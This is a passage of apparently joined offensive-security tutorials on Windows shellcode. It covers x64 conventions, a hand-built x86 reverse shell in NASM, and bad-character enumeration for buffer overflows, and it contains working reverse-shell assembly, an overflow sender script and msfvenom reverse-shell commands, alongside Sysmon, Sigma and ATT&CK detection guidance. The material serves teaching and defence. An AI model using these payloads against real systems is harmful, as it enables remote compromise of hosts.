; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
; (see §7 for the inner loop)
retEvery block in the skeleton corresponds to one of the rules established above: sub rsp, 0x28 for shadow + alignment, gs:[0x60] for the PEB, [rbx + 0x30] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB-walk API resolution | Locate kernel32.dll via gs:[0x60] chain, parse exports by hash |
| ROR-13 export hashing | Avoid embedded API name strings; survive static signature scans |
| RIP-relative PIC | lea reg, [rel label] to address embedded data without fixups |
| Sub-register zero-extension | mov eax, imm32 to write RAX with no null bytes |
| Shadow-space-aware call wrapping | sub rsp, 0x28 around every Win32 call from an unknown caller |
| Direct Win32 → Native API substitution | Call Nt* syscalls to bypass usermode hooks (T1106) |
| Reflective loading of a PE in memory | Shellcode bootstraps a full PE image without touching disk (T1620) |
11. Defensive Strategies & Detection
Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.
Sysmon events to enable and triage:
EventID 1— Process Create. Unusual parent/child chains (browser, Office, mail client spawningcmd.exe/powershell.exe) are the cheapest, highest-yield signal.EventID 8—CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.EventID 10—ProcessAccess. WatchGrantedAccessmasks like0x1FFFFF(full access) and0x1010(read + VM-write).EventID 17/18— Pipe creation/connection, frequently used by shellcode-launched implants for C2.
ETW providers worth subscribing to in EDR pipelines:
Microsoft-Windows-Kernel-Process— kernel-side process/thread/image events.Microsoft-Windows-Threat-Intelligence(PPL-only) —NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtCreateThreadExat the syscall layer, bypassed by no usermode hook.Microsoft-Windows-Security-Auditing— handle and object access.
Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.
Behavioural signals defenders should hunt on:
- Threads with
StartAddressinMEM_PRIVATEregions that arePAGE_EXECUTE_*and not backed by a file image. CallTracecontainingUNKNOWNframes — the calling instruction lives in unbacked memory.gs:[0x60]opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.- ROR-13 hashing loops in memory scans.
Sigma sketch — suspicious cross-process access typical of shellcode injection:
title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
GrantedAccess:
- '0x1FFFFF'
- '0x1410'
- '0x1010'
filter_legit:
SourceImage|endswith:
- '\MsMpEng.exe'
- '\WmiPrvSE.exe'
condition: selection and not filter_legit
level: highHardening to deploy on monitored endpoints:
- Arbitrary Code Guard (ACG) — denies the
PAGE_EXECUTE_*transition that turns aMEM_PRIVATEshellcode buffer into runnable code. - Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
- Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
- PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.
A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.
12. Tools for x64 Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection | nasm.us |
| Keystone Engine | Programmatic assembler (Python bindings) for bad-character analysis labs | keystone-engine.org |
| x64dbg | User-mode debugger; trace shellcode through gs:[0x60] and EAT walks | x64dbg.com |
| WinDbg | Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build | learn.microsoft.com |
| Ghidra / IDA | Static analysis of shellcode-bearing samples and reflective loader stubs | ghidra-sre.org |
| Volatility 3 | Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads | volatilityfoundation.org |
| Process Hacker | Live triage of thread start addresses and memory protections | processhacker.sourceforge.io |
| Godbolt Compiler Explorer | Inspect MSVC-emitted x64 prologues to confirm ABI assumptions | godbolt.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Process Injection (umbrella) | T1055 | Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess |
| DLL Injection | T1055.001 | Image Load (EventID 7) from MEM_PRIVATE-allocated path |
| Portable Executable Injection | T1055.002 | Volatility scans for PE headers in MEM_PRIVATE RX regions |
| APC Injection | T1055.004 | ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses |
| Process Hollowing | T1055.012 | EventID 1 with suspended child, followed by EventID 10 write + resume |
| Native API | T1106 | ETW Ti syscall provider; direct Nt* calls outside ntdll |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 loops; entropy heuristics on dropped payloads |
| Reflective Code Loading | T1620 | Unbacked RX memory with PE magic / no module image record |
Summary
- x64 Windows shellcode is governed by a strict ABI: argument registers
RCX/RDX/R8/R9, return inRAX, a 32-byte shadow space, and 16-byte stack alignment at everycall. - The TEB is reached via
gs:[0x60]on x64; every PEB offset (+0x18,+0x20,+0x30) differs from the x86 layout and must be verified against the target build. - Position-independent API resolution combines a PEB walk to
kernel32.dllwith an EAT walk using ROR-13 name hashing to avoid embedded strings. - Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative
lea, and XOR-then-push idioms. - Detection is layered: Sysmon
EventID 8/10for injection chains, ETWThreat-Intelligencefor syscall-level memory writes, behavioural hunts for unbackedRXregions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.
Related Tutorials
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
References
- x64 Calling Convention — Microsoft Learn (MSVC)
- x64 ABI Conventions (Software Conventions Overview) — Microsoft Learn
- x64 Architecture Overview and Register Reference — Microsoft Learn (Windows Drivers)
- x64 Stack Usage (Shadow Space / Home Space) — Microsoft Learn
- Process Injection, Technique T1055 — MITRE ATT&CK Enterprise
- Windows x64 Shellcode — Topher Timzen (Security Research)
Writing Your First Shellcode: x86 Reverse Shell from Scratch
Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate
kernel32.dll, parsing the PE export table to resolveGetProcAddresswithout imports, initialising Winsock, and spawningcmd.exeover a socket — and learn the telemetry each stage emits so you can detect and defend against it.
1. What Is Shellcode? Constraints and Goals
Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.
A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.
| Constraint | Description |
|---|---|
| Position independent | Runs at an unknown address; all references are stack-relative or computed |
| Null-free | \x00 terminates strings in many injection vectors and truncates the payload |
| No imports | API addresses must be resolved from loaded modules at runtime |
| Bad-char aware | \x00, \x0a, \x0d and vector-specific bytes must be avoided by design |
Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.
2. x86 Calling Conventions and Stack Mechanics
Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.
| Convention | Stack Cleanup | Argument Order | Used By |
|---|---|---|---|
stdcall | Callee (ret N) | Right-to-left | Win32 APIs (CreateProcessA, WSASocketA) |
cdecl | Caller | Right-to-left | CRT functions |
eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.
3. The PEB Walk: Finding kernel32.dll Without Imports
Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.
bits 32
xor eax, eax
mov eax, [fs:0x30] ; TEB->ProcessEnvironmentBlock (PEB)
mov eax, [eax+0x0c] ; PEB->Ldr (PEB_LDR_DATA)
mov eax, [eax+0x14] ; Ldr->InMemoryOrderModuleList (1st: executable)
mov eax, [eax] ; FLink -> ntdll.dll entry
mov eax, [eax] ; FLink -> kernel32.dll entry
mov ebx, [eax+0x10] ; LDR entry->DllBase (kernel32 base) -> ebxVerify the chain live in WinDbg before trusting any offset on your target build:
0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4![Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address](https://genxcyber.com/wp-content/uploads/2026/06/x86-reverse-shell-shellcode-from-scratch-bf1-scaled.png)
4. Export Table Parsing: Resolving GetProcAddress
The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).
; ebx = kernel32 base
mov eax, [ebx+0x3c] ; e_lfanew
mov eax, [ebx+eax+0x78] ; export table RVA
lea edi, [ebx+eax] ; edi -> IMAGE_EXPORT_DIRECTORY
mov ecx, [edi+0x20] ; AddressOfNames RVA
lea ecx, [ebx+ecx] ; -> name-pointer array
xor edx, edx ; name index = 0
.next:
mov esi, [ecx+edx*4] ; RVA of candidate name
lea esi, [ebx+esi] ; -> ASCII name string
; compare esi against "GetProcAddress" (string or 4-byte hash) ...
inc edx
jmp .next
.match:
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
movzx eax, word [ebx+eax+edx*2] ; ordinal index for this name
mov ecx, [edi+0x1c] ; AddressOfFunctions RVA
mov eax, [ebx+ecx+eax*4]; function RVA
lea eax, [ebx+eax] ; eax = VA of GetProcAddressProduction shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

5. Bootstrapping Further API Resolution
Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.
; ebp = resolved GetProcAddress, ebx = kernel32 base
push 0x41797261 ; "aryA"
push 0x7262694c ; "Libr"
push 0x64616f4c ; "Load"
mov esi, esp ; esi -> "LoadLibraryA"
push esi
push ebx ; hModule = kernel32
call ebp ; GetProcAddress -> LoadLibraryA in eax
; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.
6. Winsock Initialisation and Socket Creation
WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).
sub esp, 0x190 ; reserve WSADATA (400 bytes)
push esp ; lpWSAData
push 0x0202 ; wVersionRequired = 2.2
call <WSAStartup>
xor eax, eax
push eax ; dwFlags
push eax ; g
push eax ; lpProtocolInfo = NULL
push 6 ; IPPROTO_TCP
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call <WSASocketA> ; eax = socket handle
mov edi, eax ; save socket in ediBuild the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.
xor eax, eax
push eax ; sin_zero[4..8]
push eax ; sin_zero[0..4]
push 0x0100007f ; sin_addr = 127.0.0.1
push 0x5c110002 ; sin_port 4444 | sin_family AF_INET
mov esi, esp ; esi -> SOCKADDR_IN
push eax ; lpCallee/QoS chain (NULLs)
push eax
push eax
push eax
push 0x10 ; namelen
push esi ; name -> SOCKADDR_IN
push edi ; socket
call <WSAConnect>7. Spawning cmd.exe Over the Socket
The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.
xor eax, eax
push edi ; hStdError = socket
push edi ; hStdOutput = socket
push edi ; hStdInput = socket
times 9 push eax ; zero lpReserved2..dwY (9 dwords)
push 0x00000100 ; dwFlags = STARTF_USESTDHANDLES
times 4 push eax ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
push 0x44 ; cb = sizeof(STARTUPINFOA)
mov ebx, esp ; ebx -> STARTUPINFOA
sub esp, 0x10
mov esi, esp ; esi -> PROCESS_INFORMATION
push eax ; "....\0" terminator (runtime-supplied null)
push 0x6578652e ; ".exe"
push 0x646d6320 ; " cmd" (0x20 = space, null-free)
mov edx, esp ; edx -> " cmd.exe"
push esi ; lpProcessInformation
push ebx ; lpStartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax
push eax ; bInheritHandles = TRUE
dec eax
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push edx ; lpCommandLine = " cmd.exe"
push eax ; lpApplicationName = NULL
call <CreateProcessA>
push eax ; uExitCode
call <ExitProcess>
8. Null-Byte Elimination and Bad-Character Audit
A single \x00 mid-payload can truncate your shellcode. Design it out from the start.
| Bad Byte | Naive Source | Null-Free Replacement |
|---|---|---|
\x00 | mov ecx, 0 | xor ecx, ecx |
\x00 in string | push 0x00657865 (“exe\0”) | terminator from push eax after xor eax,eax |
\x00 in mov al,0 | mov al, 0 | xor eax, eax then use al |
\x0a / \x0d | constant containing CR/LF | re-encode IP/port or split the immediate |
The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:
import sys
BAD = {0x00, 0x0a, 0x0d} # extend per injection vector
with open(sys.argv[1], "rb") as f:
sc = f.read()
for i, b in enumerate(sc):
if b in BAD:
print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")9. Testing and Verification
Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.
nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };
int main(void) {
void *mem = VirtualAlloc(NULL, sizeof(sc),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE); // RWX: loud, lab-only
memcpy(mem, sc, sizeof(sc));
((void(*)())mem)();
return 0;
}Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walk | Locate kernel32.dll base with no imports via FS:[0x30] |
| Export hashing | Resolve APIs by name hash to stay small and null-free |
| Stack string building | Push reversed dwords to stage " cmd.exe", ws2_32.dll, API names |
| STDIO redirection | Point hStdInput/Output/Error at the socket for an interactive shell |
| Process injection | Deliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread |
| RWX → RX staging | Allocate RW, copy, VirtualProtect to RX to evade RWX heuristics |
11. Defensive Strategies and Detection
Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.
| Sysmon Event ID | Name | What It Catches |
|---|---|---|
1 | Process Create | cmd.exe with an unexpected ParentImage / ParentCommandLine |
3 | Network Connection | Outbound TCP from cmd.exe or a non-browser binary (C2 connect-back) |
8 | CreateRemoteThread | Cross-process thread where SourceImage ≠ TargetImage |
10 | ProcessAccess | GrantedAccess to injected memory; CallTrace containing UNKNOWN |
11 | FileCreate | Shellcode or loader dropped to disk |
Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.
The canonical community Sigma rule for shellcode injection keys on ProcessAccess:
title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
category: process_access
product: windows
detection:
selection:
GrantedAccess:
- '0x147a'
- '0x1f3fff'
CallTrace|contains: 'UNKNOWN'
condition: selection
tags:
- attack.defense_evasion
- attack.privilege_escalation
- attack.t1055
level: highHardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

12. Tools for Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86 to flat binary | nasm.us |
| WinDbg | Step the PEB walk and export parse live | microsoft.com |
| x64dbg | Dynamic analysis of the loader and payload | x64dbg.com |
| Ghidra | Static disassembly of extracted shellcode | ghidra-sre.org |
| Radare2 | Lightweight disassembly and patching | radare.org |
| Sysmon | Generate EID 1/3/8/10 detection telemetry | microsoft.com |
| Volatility | Memory forensics — recover RWX regions and injected code | volatilityfoundation.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Sysmon EID 1 / 4688 cmd.exe spawn chain |
| Process Injection | T1055 | Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN |
| Process Injection: DLL Injection | T1055.001 | Sysmon EID 7/8 on reflective-DLL delivery |
| Obfuscated Files or Information | T1027 | Null-free/encoded IP/port constants in the blob |
| Non-Application Layer Protocol | T1095 | Sysmon EID 3 / 5156 raw TCP from non-browser process |
| Application Layer Protocol: Web Protocols | T1071.001 | Proxy/TLS inspection (contrast C2 transport) |
| System Information Discovery | T1082 | PEB walk as in-memory module discovery |
| Native API | T1106 | Direct WSASocketA / CreateProcessA calls without framework APIs |
Summary
- A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects
cmd.exeover it. - The PEB walk (
FS:[0x30]→Ldr→InMemoryOrderModuleList, third entry) locateskernel32.dllwith no imports. - Parsing the PE export table resolves
GetProcAddress, which bootstrapsLoadLibraryAand every Winsock function. - Null-byte and bad-character avoidance is a design constraint, not a post-step —
xorfor zero, reversed stack strings, runtime-supplied terminators. - Det
Related Tutorials
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- x86 and x64 Assembly from Scratch
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V
References
Bad Characters, Null Bytes, and Restricted Character Sets
Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.
1. What Are Bad Characters? The Concept Explained
A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.
Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.
When you inspect memory after a crash, you are hunting for three distinct failure modes:
- Missing bytes — characters stripped entirely by a sanitiser.
- Altered bytes — characters transformed (e.g.,
\x80appearing as\x01). - Premature termination — a byte that halts the copy, so nothing after it is written.
Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

2. Why \x00 Is Always the First Enemy
The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.
| Function | Behavior on \x00 |
|---|---|
strcpy | Stops copying at the first null |
strncpy | Stops at null or n bytes |
strlen | Returns length up to first null |
sprintf | Terminates the formatted string |
gets | Legacy, present in old targets |
At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.
Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
3. Common Bad Characters by Protocol and Context
Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).
| Byte | Hex | Reason |
|---|---|---|
| Null | \x00 | String terminator — always bad in string overflows |
| Line Feed | \x0A | Newline — terminates input in many protocol parsers |
| Carriage Return | \x0D | CR — terminates input lines (HTTP, SMTP, POP3) |
| Space | \x20 | Whitespace delimiter — terminates tokens in some parsers |
| Form Feed | \xFF | Causes issues in some parsing contexts |
A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
4. Building and Sending the Test Byte Array
The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:
# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))
offset = 2003 # VulnServer TRUN EIP offset (illustrative)
buf = b"A" * offset
buf += b"B" * 4 # EIP overwrite marker
buf += bytes(badchar_test) # byte array lands at ESP
buf += b"C" * (3000 - len(buf)) # paddingYou then deliver that buffer to the vulnerable service running under a debugger:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf) # VulnServer TRUN command
s.close()After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.
5. Inspecting Memory: Immunity Debugger and mona.py
In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.
!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>!mona configsets the output directory.!mona bytearray -cpb "\x00"writes a referencebytearray.bin(all\x01–\xFF) excluding the specified bad chars.!mona comparediffs the reference file against the live memory at the suppliedESPaddress and prints a per-byte verdict.
Annotated mona output looks like:
[+] Comparing with memory at address 0x00ab1a30
Only the first 18 bytes were identical
Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...6. Iterative Elimination: Narrowing the Bad List
Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.
If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:
BADCHARS = b"\x00\x0a\x0d" # grows one confirmed byte per pass
full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)
# rebuild buffer with `test`, resend, re-inspect under the debuggerRepeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.

7. Encoding Shellcode with msfvenom
Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f pythonx86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.
Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.
Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f pythonx86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

8. Alphanumeric and Printable-Only Constraints
When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
-e x86/alpha_mixed BufferRegister=ESP -f pythonThe BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
9. Instruction Substitution: Jumping Without Bad Opcodes
Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.
| Instruction | Opcode bytes | Notes |
|---|---|---|
JMP SHORT +6 | \xEB \x06 | \xEB often restricted |
JE / JNE pair | \x74 .. \x75 .. | Two complementary branches always taken together |
Near JMP | \xE9 .. .. .. .. | Alternative when \xEB is bad |
A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:
; JMP SHORT replacement using complementary conditionals
je short target ; 74 xx -> jump if ZF=1
jne short target ; 75 xx -> jump if ZF=0
; one branch is always taken; no \xEB byte present
target:
; decoder / shellcode continues hereIn SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
10. Unicode / Wide-Character Transformations
A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.
# You send: \x41\x42
# Memory shows: \x41\x00\x42\x00 <- every odd byte zeroed
sent = b"\x41\x42"
observed = b"\x41\x00\x42\x00" # Unicode expansion in the debuggerA naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Bad-char enumeration | Inject \x01–\xFF, diff memory, identify forbidden bytes |
| Shellcode encoding | Re-encode with shikata_ga_nai / call4_dword_xor to avoid bad bytes |
| Alphanumeric shellcode | alpha_mixed / Alpha2 for printable-only constraints |
| Jump substitution | Replace \xEB with JE/JNE pairs or near JMP |
| Venetian shellcode | Survive Unicode expansion in wide-character buffers |
| Egghunter staging | Small finder stub locating a larger payload in tight buffers |
These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.
12. Defensive Strategies & Detection
Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Frameworks (Metasploit, Empire) launching payloads |
3 | Network Connection | Outbound C2 from an exploited process |
8 | CreateRemoteThread | Post-exploitation thread injection |
10 | ProcessAccess | Cross-process open by injected payload |
11 | FileCreate | Shellcode or payload dropped to disk |
Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.
title: Shellcode Injection via Suspicious Process Access
logsource:
category: process_access
product: windows
detection:
selection:
EventID: 10
GrantedAccess:
- '0x147a'
- '0x1f3fff'
CallTrace|contains: 'UNKNOWN'
condition: selection
level: highAdditional telemetry and hardening:
- ETW — subscribe to
Microsoft-Windows-Threat-Intelligence(ETWTI) to observe injection and memory manipulation;Microsoft-Windows-Security-Auditingfor process audit events. - Audit Process Creation (Detailed Tracking) → Security Event
4688with command-line logging captures framework invocations. - WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
- Compiler mitigations —
